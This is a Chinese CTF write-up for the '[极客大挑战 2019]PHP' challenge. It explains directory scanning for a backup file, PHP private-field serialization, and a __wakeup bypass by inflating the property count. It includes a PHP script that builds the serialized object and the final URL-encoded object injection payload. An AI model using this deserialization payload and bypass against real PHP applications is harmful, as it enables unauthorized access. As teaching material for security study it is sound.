题目
点进页面显示如下
根据页面提示,这个网站有备份文件,备份文件一般是bak文件格式,用dirsearch扫描
访问之后下载了一个文件
里面都是一些代码
在index.php中发现了一个类的文件,一个get传参,然后将传进的值进行反序列化
在class.php中,如果username===admin,password=100,返回flag
构造一个反序列化
<?php
class Name{
private $username = "admin";
private $password = 100;
}
$a = new Name();
$str=serialize($a);
echo $str;
?>
Name和password之间有不可见字符,private声明的字段为私有字段,只在所声明的类中课件,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上ascii为0的字符(不可见字符)
所以因改为
O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
这里还需要绕过__wakeup函数
构造payload
?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
总结
1.从__destruct,__construct,__wakeup可以判断存在反序列化漏洞
2.php序列化与反序列化
序列化:函数为serialize(),把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等
反序列化:函数为unserialize(),将字符串转换成变量或对象的过程
常用的内置方法:
__construct():创建对象时初始化,当一个对象创建时被调用
__wakeup() 使用unserialize时触发
__sleep() 使用serialize时触发
__destruction():结束时销毁对象,当一个对象销毁时被调用
3.private声明的字段为私有字段,只在所声明的类中课件,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上ascii为0的字符(不可见字符)
4.__wakeup函数绕过
在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行
原本:O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
绕过:O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
参考学习链接:
[极客大挑战 2019]PHP
[极客大挑战 2019]PHP unserialize_buuctf [极客大挑战 2019]php-CSDN博客
